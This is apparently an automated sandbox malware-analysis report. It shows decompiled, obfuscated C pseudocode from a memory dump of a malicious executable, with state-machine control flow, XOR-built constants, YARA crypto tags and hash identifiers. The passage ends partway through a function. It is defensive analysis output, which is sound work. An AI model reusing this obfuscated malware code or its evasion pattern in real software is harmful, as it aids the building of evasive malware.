                          0x00000000
                          0x01218ab8
                          0x01218a2e
                          0x01218a86
                          0x01218a87
                          0x01218a8b
                          0x01218a90
                          0x01218a93
                          0x01218a97
                          0x01218aae
                          0x01218a99
                          0x01218a99
                          0x01218aa4
                          0x01218aa4
                          0x00000000
                          0x01218a97
                          0x01218a36
                          0x00000000
                          0x00000000
                          0x01218a5f
                          0x01218a64
                          0x01218a69
                          0x00000000
                          0x00000000
                          0x01218a6f
                          0x01218a6f
                          0x01218b6b
                          0x01218c86
                          0x01218c8c
                          0x00000000
                          0x01218c8c
                          0x01218b77
                          0x01218c48
                          0x01218c56
                          0x01218c6a
                          0x01218c6f
                          0x00000000
                          0x01218c6f
                          0x01218b83
                          0x01218bdc
                          0x01218bea
                          0x01218c02
                          0x01218c0c
                          0x01218c1b
                          0x01218c26
                          0x01218c2b
                          0x01218c30
                          0x00000000
                          0x00000000
                          0x01218c36
                          0x00000000
                          0x01218c36
                          0x01218b8b
                          0x00000000
                          0x00000000
                          0x01218baf
                          0x01218bb4
                          0x01218bbb
                          0x01218bc3
                          0x00000000
                          0x01218c91
                          0x01218c91
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $5A$E:e$GfH$aq$e-$ee$yC
                          • API String ID: 0-3344464735
                          • Opcode ID: 45730276a8462984ee385fd950f205e3bdfa535a6e1d1655b427a2fe2de1701f
                          • Instruction ID: d10538a0d5605beff886346598ea88567918c8feae9dd8a89afbe8a0d9ed14e5
                          • Opcode Fuzzy Hash: 45730276a8462984ee385fd950f205e3bdfa535a6e1d1655b427a2fe2de1701f
                          • Instruction Fuzzy Hash: 4B1232715093818FD368CF25C58A69BFBE2FBD5708F108A1DE2D98A264D7B19949CF03
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121243F, Relevance: 10.3, Strings: 8, Instructions: 329COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E0121243F() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t360;
				signed int _t370;
				intOrPtr _t371;
				void* _t374;
				void* _t376;
				void* _t379;
				char _t386;
				void* _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t436;

				_t436 =  &_v700;
				_v644 = 0x6bdfd1;
				_v644 = _v644 ^ 0x979670b7;
				_t376 = 0xb677678;
				_v644 = _v644 ^ 0xe993d947;
				_v644 = _v644 ^ 0x7e6e7620;
				_v600 = 0xd44612;
				_v600 = _v600 | 0xd6032db3;
				_v600 = _v600 ^ 0xd6d76eb3;
				_v608 = 0x321328;
				_v608 = _v608 >> 3;
				_v608 = _v608 ^ 0x00064266;
				_v588 = 0x1dc3e4;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x00003b87;
				_v676 = 0xca28c5;
				_t422 = 0x7e;
				_v676 = _v676 / _t422;
				_v676 = _v676 | 0xa39659f7;
				_t421 = 0;
				_v676 = _v676 ^ 0x9bdf3521;
				_v676 = _v676 ^ 0x38462660;
				_v576 = 0xa1f767;
				_v576 = _v576 ^ 0x30e8e272;
				_v576 = _v576 ^ 0x30437e3f;
				_v636 = 0x30193b;
				_v636 = _v636 | 0xf98ebf42;
				_v636 = _v636 + 0x465a;
				_v636 = _v636 ^ 0xf9b7d3fa;
				_v628 = 0xf8a9c2;
				_v628 = _v628 + 0xffff9b4a;
				_v628 = _v628 ^ 0x6f3e3305;
				_v628 = _v628 ^ 0x6fc79a5a;
				_v580 = 0x34221d;
				_t423 = 0x6c;
				_v580 = _v580 * 0x72;
				_v580 = _v580 ^ 0x17329e1c;
				_v592 = 0x46a854;
				_v592 = _v592 / _t423;
				_v592 = _v592 ^ 0x0007e2d0;
				_v620 = 0x648007;
				_v620 = _v620 | 0x9fe7b715;
				_v620 = _v620 ^ 0x9fe05ac1;
				_v596 = 0x398eba;
				_v596 = _v596 ^ 0x9c50c709;
				_v596 = _v596 ^ 0x9c6d9ce7;
				_v656 = 0x78fbe3;
				_v656 = _v656 ^ 0x2a394479;
				_v656 = _v656 << 0xf;
				_v656 = _v656 ^ 0xdfce0ee6;
				_v604 = 0x877df3;
				_v604 = _v604 << 0x10;
				_v604 = _v604 ^ 0x7df4962b;
				_v668 = 0xe3c70c;
				_v668 = _v668 + 0xffff4197;
				_v668 = _v668 ^ 0x05e9e866;
				_v668 = _v668 << 6;
				_v668 = _v668 ^ 0x42b90c9e;
				_v584 = 0x266e86;
				_t424 = 0x57;
				_v584 = _v584 / _t424;
				_v584 = _v584 ^ 0x0003ff1f;
				_v632 = 0x9b2ca7;
				_v632 = _v632 >> 0xd;
				_v632 = _v632 * 0xd;
				_v632 = _v632 ^ 0x000bc767;
				_v640 = 0x866b44;
				_v640 = _v640 >> 3;
				_v640 = _v640 / _t424;
				_v640 = _v640 ^ 0x000c4f6e;
				_v612 = 0xa7dbb0;
				_t425 = 0x64;
				_v612 = _v612 / _t425;
				_v612 = _v612 ^ 0x00021f99;
				_v660 = 0x73f9e8;
				_t426 = 0x2d;
				_v660 = _v660 / _t426;
				_v660 = _v660 << 0xf;
				_v660 = _v660 ^ 0xc81ec68f;
				_v660 = _v660 ^ 0x81f41619;
				_v648 = 0x3a909a;
				_v648 = _v648 | 0x97e2c35a;
				_v648 = _v648 ^ 0xba86c636;
				_v648 = _v648 ^ 0x2d7c8adf;
				_v684 = 0x48be9e;
				_v684 = _v684 << 5;
				_t427 = 0x38;
				_v684 = _v684 * 0x4e;
				_v684 = _v684 + 0x761d;
				_v684 = _v684 ^ 0xc540ef8d;
				_v692 = 0xdf149e;
				_v692 = _v692 + 0x6a74;
				_v692 = _v692 ^ 0xeda6358b;
				_v692 = _v692 / _t427;
				_v692 = _v692 ^ 0x043a92ab;
				_v700 = 0x93dbf7;
				_t428 = 0x63;
				_v700 = _v700 * 0x3a;
				_v700 = _v700 / _t428;
				_t429 = 0x46;
				_v700 = _v700 / _t429;
				_v700 = _v700 ^ 0x000b92b0;
				_v680 = 0x8c923f;
				_v680 = _v680 | 0xccd3540a;
				_v680 = _v680 + 0x1565;
				_v680 = _v680 << 0xa;
				_v680 = _v680 ^ 0x7fa7961b;
				_v672 = 0x35bac0;
				_v672 = _v672 * 0x3b;
				_v672 = _v672 | 0x58738310;
				_v672 = _v672 * 0x25;
				_v672 = _v672 ^ 0x5cb4f925;
				_v688 = 0x377abe;
				_v688 = _v688 << 0xe;
				_v688 = _v688 + 0xa60e;
				_v688 = _v688 + 0xffffc1e2;
				_v688 = _v688 ^ 0xdeab84d7;
				_v652 = 0xa7878e;
				_v652 = _v652 + 0x1c57;
				_t430 = 0x12;
				_v652 = _v652 / _t430;
				_v652 = _v652 ^ 0x0003c11d;
				_v664 = 0x5b36fc;
				_v664 = _v664 + 0x818f;
				_v664 = _v664 << 7;
				_v664 = _v664 ^ 0x5d500fca;
				_v664 = _v664 ^ 0x70881f80;
				_v696 = 0x90a36e;
				_v696 = _v696 ^ 0xdcc3f2e8;
				_v696 = _v696 + 0xe5e9;
				_v696 = _v696 | 0x46a1024e;
				_v696 = _v696 ^ 0xdef79675;
				_v616 = 0x1c8a85;
				_v616 = _v616 << 0xd;
				_t431 = 0xe;
				_v616 = _v616 / _t431;
				_v616 = _v616 ^ 0x0a61a4ac;
				_v624 = 0xfaa176;
				_t432 = 0x76;
				_v624 = _v624 / _t432;
				_t433 = 0x55;
				_t375 = _v612;
				_v624 = _v624 / _t433;
				_v624 = _v624 ^ 0x000fa73f;
				do {
					while(_t376 != 0x24eee0d) {
						if(_t376 == 0x4039ddf) {
							_v572 = _v572 - E0121CE0E(_t376);
							_t376 = 0x24eee0d;
							asm("sbb [esp+0x94], edx");
							continue;
						} else {
							if(_t376 == 0x4d73541) {
								E01224A33(_v616, _v624, _t375);
							} else {
								if(_t376 == 0x728cc3d) {
									_t419 = _v576;
									E01231C21(_v676, _v576,  &_v572, _v636, _v628);
									_t436 =  &(_t436[3]);
									_t376 = 0x4039ddf;
									continue;
								} else {
									if(_t376 == 0x7671ba8) {
										_t370 = E0122B302( &_v524, _t419, _v648, _v684, _v600, 0, _v608, _v692, _t376, _v700, _v680, _v672, _v644);
										_t375 = _t370;
										_t436 =  &(_t436[0xb]);
										__eflags = _t370 - 0xffffffff;
										if(__eflags != 0) {
											_t376 = 0xa69e27e;
											continue;
										}
									} else {
										if(_t376 == 0xa69e27e) {
											_t386 = _v572;
											_t371 = _v568;
											_push(_t386);
											_v560 = _t371;
											_v552 = _t371;
											_v544 = _t371;
											_v536 = _t371;
											_v532 = _v588;
											_v564 = _t386;
											_v556 = _t386;
											_v548 = _t386;
											_v540 = _t386;
											_t374 = E01224B76(_v688, _t419, _v652, _v664,  &_v564, _v696, _t375);
											_t436 =  &(_t436[6]);
											__eflags = _t374;
											_t421 =  !=  ? 1 : _t421;
											_t376 = 0x4d73541;
											continue;
										} else {
											if(_t376 != 0xb677678) {
												goto L15;
											} else {
												_t376 = 0x728cc3d;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t421;
					}
					_push(_v620);
					_push(_v592);
					_t360 = E0122CD35(0x1211000, _v580, __eflags);
					_pop(_t379);
					_t434 = _t360;
					_t417 =  *0x1235218;
					__eflags =  *0x1235218 + 0x234;
					E01222EA5( *0x1235218 + 0x234,  *0x1235218 + 0x234, _t417 + 0x18, _t379, _v656, _v604, _t434, _v668, _v584,  &_v524);
					_t419 = _t434;
					E0122629F(_v632, _t434, _v640, _v612, _v660);
					_t436 =  &(_t436[0xb]);
					_t376 = 0x7671ba8;
					L15:
					__eflags = _t376 - 0x53cf906;
				} while (__eflags != 0);
				goto L18;
			}





































































                          0x0121243f
                          0x01212445
                          0x0121244f
                          0x01212457
                          0x0121245c
                          0x01212464
                          0x0121246c
                          0x01212474
                          0x0121247c
                          0x01212484
                          0x0121248c
                          0x01212491
                          0x01212499
                          0x012124a1
                          0x012124a6
                          0x012124ae
                          0x012124c0
                          0x012124c5
                          0x012124cb
                          0x012124d3
                          0x012124d5
                          0x012124dd
                          0x012124e5
                          0x012124f0
                          0x012124fb
                          0x01212506
                          0x0121250e
                          0x01212516
                          0x0121251e
                          0x01212526
                          0x0121252e
                          0x01212536
                          0x0121253e
                          0x01212546
                          0x01212559
                          0x0121255c
                          0x01212563
                          0x0121256e
                          0x01212584
                          0x0121258b
                          0x01212596
                          0x0121259e
                          0x012125a6
                          0x012125ae
                          0x012125b6
                          0x012125be
                          0x012125c6
                          0x012125ce
                          0x012125d6
                          0x012125db
                          0x012125e3
                          0x012125eb
                          0x012125f0
                          0x012125f8
                          0x01212600
                          0x01212608
                          0x01212610
                          0x01212615
                          0x0121261d
                          0x0121262f
                          0x01212632
                          0x01212639
                          0x01212644
                          0x0121264c
                          0x01212656
                          0x0121265c
                          0x01212664
                          0x0121266c
                          0x01212679
                          0x0121267f
                          0x01212687
                          0x01212693
                          0x01212698
                          0x0121269e
                          0x012126a6
                          0x012126b2
                          0x012126b7
                          0x012126bd
                          0x012126c2
                          0x012126ca
                          0x012126d2
                          0x012126da
                          0x012126e2
                          0x012126ea
                          0x012126f2
                          0x012126fa
                          0x01212704
                          0x01212707
                          0x0121270b
                          0x01212713
                          0x0121271b
                          0x01212723
                          0x0121272b
                          0x0121273b
                          0x0121273f
                          0x01212747
                          0x01212754
                          0x01212757
                          0x01212763
                          0x0121276b
                          0x0121276e
                          0x01212772
                          0x0121277a
                          0x01212782
                          0x0121278a
                          0x01212792
                          0x01212797
                          0x0121279f
                          0x012127ac
                          0x012127b0
                          0x012127bd
                          0x012127c1
                          0x012127c9
                          0x012127d1
                          0x012127d6
                          0x012127de
                          0x012127e6
                          0x012127ee
                          0x012127f6
                          0x0121280b
                          0x01212810
                          0x01212816
                          0x0121281e
                          0x01212826
                          0x0121282e
                          0x01212833
                          0x0121283b
                          0x01212843
                          0x0121284b
                          0x01212853
                          0x0121285b
                          0x01212863
                          0x0121286b
                          0x01212873
                          0x0121287c
                          0x01212881
                          0x01212887
                          0x0121288f
                          0x0121289b
                          0x012128a0
                          0x012128aa
                          0x012128ad
                          0x012128b1
                          0x012128b5
                          0x012128bd
                          0x012128bd
                          0x012128cf
                          0x01212a18
                          0x01212a1f
                          0x01212a24
                          0x00000000
                          0x012128d5
                          0x012128db
                          0x01212ac8
                          0x012128e1
                          0x012128e3
                          0x012129f5
                          0x01212a01
                          0x01212a06
                          0x01212a09
                          0x00000000
                          0x012128e9
                          0x012128ef
                          0x012129c9
                          0x012129ce
                          0x012129d0
                          0x012129d3
                          0x012129d6
                          0x012129dc
                          0x00000000
                          0x012129dc
                          0x012128f5
                          0x012128fb
                          0x0121290d
                          0x01212914
                          0x0121291b
                          0x0121291d
                          0x01212924
                          0x0121292b
                          0x01212932
                          0x01212944
                          0x01212957
                          0x01212962
                          0x01212969
                          0x01212970
                          0x0121297b
                          0x01212982
                          0x01212986
                          0x01212988
                          0x0121298b
                          0x00000000
                          0x012128fd
                          0x01212903
                          0x00000000
                          0x01212909
                          0x01212909
                          0x00000000
                          0x01212909
                          0x01212903
                          0x012128fb
                          0x012128ef
                          0x012128e3
                          0x012128db
                          0x01212ace
                          0x01212ada
                          0x01212ada
                          0x01212a30
                          0x01212a39
                          0x01212a47
                          0x01212a4d
                          0x01212a4e
                          0x01212a6f
                          0x01212a80
                          0x01212a87
                          0x01212a90
                          0x01212aa4
                          0x01212aa9
                          0x01212aac
                          0x01212ab1
                          0x01212ab1
                          0x01212ab1
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: vn~$?~C0$ZF$`&F8$tj$yD9*$~i$~i
                          • API String ID: 0-1622661322
                          • Opcode ID: af70eb449912f5d7663f9bf19f99663d0e483db745d83d2bf06095e8b3fadd24
                          • Instruction ID: ba6c1e9bd9acede5991112c4f3445bce3dfd6d39275f086b627f88f514e4cfdd
                          • Opcode Fuzzy Hash: af70eb449912f5d7663f9bf19f99663d0e483db745d83d2bf06095e8b3fadd24
                          • Instruction Fuzzy Hash: 09F10071509381DFD368CF26C949A5BBBE2FBC4758F10891DF29A86260D7B58909CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122B677, Relevance: 10.3, Strings: 8, Instructions: 309COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E0122B677(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t325;
				void* _t355;
				void* _t358;
				intOrPtr _t365;
				intOrPtr* _t366;
				void* _t368;
				intOrPtr _t393;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				void* _t404;
				void* _t405;

				_t395 = _a8;
				_t366 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t325);
				_v12 = 0xab9d1;
				_t393 = 0;
				_v8 = 0;
				_t405 = _t404 + 0x18;
				_v72 = 0x7e0a00;
				_v72 = _v72 << 1;
				_t368 = 0xe28fb16;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x00003f04;
				_v44 = 0xe02806;
				_v44 = _v44 << 0x10;
				_v44 = _v44 ^ 0x28060001;
				_v116 = 0x28ec3f;
				_t20 =  &_v116; // 0x28ec3f
				_t396 = 0x6f;
				_v116 =  *_t20 / _t396;
				_t397 = 0x25;
				_v116 = _v116 / _t397;
				_v116 = _v116 + 0xffff36e4;
				_v116 = _v116 ^ 0xffff3971;
				_v80 = 0x2e26f9;
				_t398 = 0x64;
				_v80 = _v80 * 0x45;
				_v80 = _v80 + 0xffff4162;
				_v80 = _v80 ^ 0x0c6fc27f;
				_v100 = 0xb1aef7;
				_v100 = _v100 * 0x1a;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0xf269cef5;
				_v100 = _v100 ^ 0xf268ee49;
				_v60 = 0xf2634;
				_v60 = _v60 * 0x5b;
				_v60 = _v60 ^ 0x0562947c;
				_v36 = 0x2018cb;
				_v36 = _v36 ^ 0x8c25c5f6;
				_v36 = _v36 ^ 0x8c05dd3d;
				_v64 = 0xf8940d;
				_v64 = _v64 | 0x87d24572;
				_v64 = _v64 ^ 0x5c16a201;
				_v64 = _v64 ^ 0xdbe26406;
				_v40 = 0x7c480a;
				_v40 = _v40 << 3;
				_v40 = _v40 ^ 0x03ea2f69;
				_v108 = 0x2ee5ba;
				_v108 = _v108 ^ 0xf599a2db;
				_v108 = _v108 >> 3;
				_v108 = _v108 >> 6;
				_v108 = _v108 ^ 0x0070f037;
				_v124 = 0xf71a4a;
				_v124 = _v124 << 0x10;
				_v124 = _v124 | 0xaf227d43;
				_v124 = _v124 >> 9;
				_v124 = _v124 ^ 0x00557cee;
				_v132 = 0xd794ed;
				_v132 = _v132 / _t398;
				_v132 = _v132 >> 0xf;
				_v132 = _v132 >> 9;
				_v132 = _v132 ^ 0x00022203;
				_v48 = 0x2c4233;
				_v48 = _v48 + 0xffff6721;
				_v48 = _v48 ^ 0x0020eee8;
				_v56 = 0x922e5e;
				_v56 = _v56 + 0xffff04d8;
				_v56 = _v56 ^ 0x00934383;
				_v84 = 0x9b8956;
				_v84 = _v84 << 4;
				_t399 = 0x3e;
				_v84 = _v84 / _t399;
				_v84 = _v84 ^ 0x0024d73e;
				_v140 = 0xe285f0;
				_t400 = 0x2b;
				_v140 = _v140 / _t400;
				_t401 = 0x75;
				_v140 = _v140 * 0x54;
				_v140 = _v140 ^ 0x36893739;
				_v140 = _v140 ^ 0x373574c3;
				_v148 = 0x700371;
				_v148 = _v148 ^ 0x52856356;
				_v148 = _v148 + 0x5a74;
				_v148 = _v148 * 0x33;
				_v148 = _v148 ^ 0x86f5f6a0;
				_v104 = 0xae45eb;
				_v104 = _v104 * 0x47;
				_v104 = _v104 ^ 0x5c3d10c1;
				_v104 = _v104 + 0xffff4879;
				_v104 = _v104 ^ 0x6c69943e;
				_v144 = 0xeba846;
				_v144 = _v144 * 0x65;
				_v144 = _v144 << 7;
				_v144 = _v144 << 0xc;
				_v144 = _v144 ^ 0x1cf6ea5a;
				_v120 = 0x7964a1;
				_v120 = _v120 << 0x10;
				_v120 = _v120 ^ 0xe77bd097;
				_v120 = _v120 ^ 0x97606998;
				_v120 = _v120 ^ 0x14b3ea1b;
				_v68 = 0x60b4f9;
				_v68 = _v68 ^ 0x3cdba86f;
				_v68 = _v68 + 0xffff76c3;
				_v68 = _v68 ^ 0x3cb9ec82;
				_v76 = 0xf18242;
				_v76 = _v76 + 0xffff0809;
				_v76 = _v76 | 0x29202b9a;
				_v76 = _v76 ^ 0x29fa2e53;
				_v28 = 0xc34101;
				_v28 = _v28 * 0x25;
				_v28 = _v28 ^ 0x1c332c9c;
				_v152 = 0x69efe7;
				_v152 = _v152 << 6;
				_v152 = _v152 >> 8;
				_v152 = _v152 | 0x90a804ff;
				_v152 = _v152 ^ 0x90b9dc27;
				_v52 = 0xbb99d0;
				_v52 = _v52 / _t401;
				_v52 = _v52 ^ 0x000f2420;
				_v24 = 0x38339b;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x000b04cc;
				_v96 = 0x52b09a;
				_v96 = _v96 | 0x755dd4ed;
				_t402 = 0x23;
				_v96 = _v96 * 0x66;
				_v96 = _v96 + 0x23a3;
				_v96 = _v96 ^ 0xc43b953b;
				_v128 = 0x98d7e0;
				_v128 = _v128 + 0x7bca;
				_v128 = _v128 * 0x3e;
				_v128 = _v128 + 0xf8ad;
				_v128 = _v128 ^ 0x2522e9e9;
				_v112 = 0x782ce5;
				_v112 = _v112 + 0xffff9380;
				_v112 = _v112 + 0x9be5;
				_v112 = _v112 ^ 0x23472c87;
				_v112 = _v112 ^ 0x233cdfa9;
				_v136 = 0x3d5208;
				_v136 = _v136 * 0x1d;
				_v136 = _v136 / _t402;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x000e447f;
				_v88 = 0xb35ee9;
				_v88 = _v88 + 0xe5d2;
				_v88 = _v88 + 0xffffdc93;
				_v88 = _v88 ^ 0x00b3e58d;
				_v92 = 0x21f8b6;
				_v92 = _v92 * 0x30;
				_v92 = _v92 >> 6;
				_v92 = _v92 | 0x81929639;
				_v92 = _v92 ^ 0x81904b86;
				_v32 = 0x36c343;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x00d9bc6c;
				while(_t368 != 0x1c43801) {
					if(_t368 == 0x9b73326) {
						_t355 = E01217C0C( *((intOrPtr*)( *0x1235220 + 0x44)),  *_t395, _v64, _t368, _v40,  &_v16, _v72, _v108, _v116, _v124, _v132,  *((intOrPtr*)(_t395 + 4)), _v48, _t368, _v56, _v80, _v84, _v140, _t393, _v148);
						_t405 = _t405 + 0x48;
						if(_t355 == _v100) {
							_t368 = 0xe7fcf14;
							continue;
						}
					} else {
						if(_t368 == 0xb54e992) {
							_t358 = E01217C0C( *((intOrPtr*)( *0x1235220 + 0x44)),  *_t395, _v76, _t368, _v28,  &_v16, _v44, _v152, _v60, _v52, _v24,  *((intOrPtr*)(_t395 + 4)), _v96, _t368, _v128, _v16, _v112, _v136, _v20, _v88);
							_t405 = _t405 + 0x48;
							if(_t358 == _v36) {
								 *_t366 = _v20;
								_t393 = 1;
								 *((intOrPtr*)(_t366 + 4)) = _v16;
							} else {
								_t368 = 0x1c43801;
								continue;
							}
						} else {
							if(_t368 == 0xe28fb16) {
								_t368 = 0x9b73326;
								continue;
							} else {
								if(_t368 != 0xe7fcf14) {
									L14:
									if(_t368 != 0x2c4f76c) {
										continue;
									} else {
									}
								} else {
									_push(_t368);
									_push(_t368);
									_t365 = E01225212(_v16);
									_t405 = _t405 + 0xc;
									_v20 = _t365;
									if(_t365 != 0) {
										_t368 = 0xb54e992;
										continue;
									}
								}
							}
						}
					}
					return _t393;
				}
				E0121AE43(_v20, _v92, _v32);
				_t368 = 0x2c4f76c;
				goto L14;
			}
























































                          0x0122b680
                          0x0122b687
                          0x0122b68a
                          0x0122b691
                          0x0122b698
                          0x0122b699
                          0x0122b6a0
                          0x0122b6a1
                          0x0122b6a2
                          0x0122b6a7
                          0x0122b6b2
                          0x0122b6b4
                          0x0122b6bb
                          0x0122b6be
                          0x0122b6c8
                          0x0122b6cc
                          0x0122b6d1
                          0x0122b6d6
                          0x0122b6de
                          0x0122b6e9
                          0x0122b6f1
                          0x0122b6fc
                          0x0122b704
                          0x0122b70a
                          0x0122b70f
                          0x0122b719
                          0x0122b71e
                          0x0122b724
                          0x0122b72c
                          0x0122b734
                          0x0122b741
                          0x0122b742
                          0x0122b746
                          0x0122b74e
                          0x0122b756
                          0x0122b763
                          0x0122b767
                          0x0122b76c
                          0x0122b774
                          0x0122b77c
                          0x0122b789
                          0x0122b78d
                          0x0122b795
                          0x0122b7a0
                          0x0122b7ab
                          0x0122b7b6
                          0x0122b7be
                          0x0122b7c6
                          0x0122b7ce
                          0x0122b7d6
                          0x0122b7e1
                          0x0122b7e9
                          0x0122b7f4
                          0x0122b7fc
                          0x0122b804
                          0x0122b809
                          0x0122b80e
                          0x0122b816
                          0x0122b81e
                          0x0122b823
                          0x0122b82b
                          0x0122b830
                          0x0122b838
                          0x0122b846
                          0x0122b84c
                          0x0122b851
                          0x0122b856
                          0x0122b85e
                          0x0122b866
                          0x0122b86e
                          0x0122b876
                          0x0122b87e
                          0x0122b886
                          0x0122b88e
                          0x0122b896
                          0x0122b8a1
                          0x0122b8a6
                          0x0122b8ac
                          0x0122b8b4
                          0x0122b8c0
                          0x0122b8c5
                          0x0122b8d0
                          0x0122b8d1
                          0x0122b8d5
                          0x0122b8dd
                          0x0122b8e5
                          0x0122b8ed
                          0x0122b8f5
                          0x0122b902
                          0x0122b906
                          0x0122b90e
                          0x0122b91b
                          0x0122b91f
                          0x0122b927
                          0x0122b92f
                          0x0122b937
                          0x0122b944
                          0x0122b948
                          0x0122b94d
                          0x0122b952
                          0x0122b95a
                          0x0122b962
                          0x0122b967
                          0x0122b96f
                          0x0122b977
                          0x0122b97f
                          0x0122b987
                          0x0122b98f
                          0x0122b997
                          0x0122b99f
                          0x0122b9a7
                          0x0122b9af
                          0x0122b9b7
                          0x0122b9bf
                          0x0122b9d2
                          0x0122b9d9
                          0x0122b9e4
                          0x0122b9ec
                          0x0122b9f1
                          0x0122b9f6
                          0x0122b9fe
                          0x0122ba06
                          0x0122ba14
                          0x0122ba18
                          0x0122ba20
                          0x0122ba2b
                          0x0122ba33
                          0x0122ba3e
                          0x0122ba48
                          0x0122ba57
                          0x0122ba58
                          0x0122ba5c
                          0x0122ba64
                          0x0122ba6c
                          0x0122ba74
                          0x0122ba81
                          0x0122ba85
                          0x0122ba8d
                          0x0122ba95
                          0x0122ba9d
                          0x0122baa5
                          0x0122baad
                          0x0122bab5
                          0x0122babd
                          0x0122baca
                          0x0122bad9
                          0x0122badd
                          0x0122bae2
                          0x0122baea
                          0x0122baf2
                          0x0122bafa
                          0x0122bb02
                          0x0122bb0a
                          0x0122bb17
                          0x0122bb1b
                          0x0122bb20
                          0x0122bb28
                          0x0122bb30
                          0x0122bb3b
                          0x0122bb43
                          0x0122bb4e
                          0x0122bb5c
                          0x0122bc9c
                          0x0122bca1
                          0x0122bca8
                          0x0122bcaa
                          0x00000000
                          0x0122bcaa
                          0x0122bb62
                          0x0122bb68
                          0x0122bc24
                          0x0122bc29
                          0x0122bc33
                          0x0122bce8
                          0x0122bcea
                          0x0122bcf2
                          0x0122bc39
                          0x0122bc39
                          0x00000000
                          0x0122bc39
                          0x0122bb6a
                          0x0122bb70
                          0x0122bbb5
                          0x00000000
                          0x0122bb72
                          0x0122bb78
                          0x0122bcd1
                          0x0122bcd7
                          0x00000000
                          0x00000000
                          0x0122bcdd
                          0x0122bb7e
                          0x0122bb8e
                          0x0122bb8f
                          0x0122bb97
                          0x0122bb9c
                          0x0122bb9f
                          0x0122bba8
                          0x0122bbae
                          0x00000000
                          0x0122bbae
                          0x0122bba8
                          0x0122bb78
                          0x0122bb70
                          0x0122bb68
                          0x0122bd01
                          0x0122bd01
                          0x0122bcc6
                          0x0122bccc
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: H|$?($tZ$,x$|U$ $"%$i
                          • API String ID: 0-3225341047
                          • Opcode ID: 72a81b4b5b3b2f3b71d41ade6f11d867ed023564950f78683e8162519960a2b7
                          • Instruction ID: 98ed7093604779b23bbf7eee7f9e8b0837cc270ca6dd28af7d6a77ddb779719b
                          • Opcode Fuzzy Hash: 72a81b4b5b3b2f3b71d41ade6f11d867ed023564950f78683e8162519960a2b7
                          • Instruction Fuzzy Hash: 04F1EE710183819FD768CF65C58AA5BFBF1FBD4748F40891DF69986260C7B28949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121B464, Relevance: 9.1, Strings: 7, Instructions: 357COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E0121B464(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
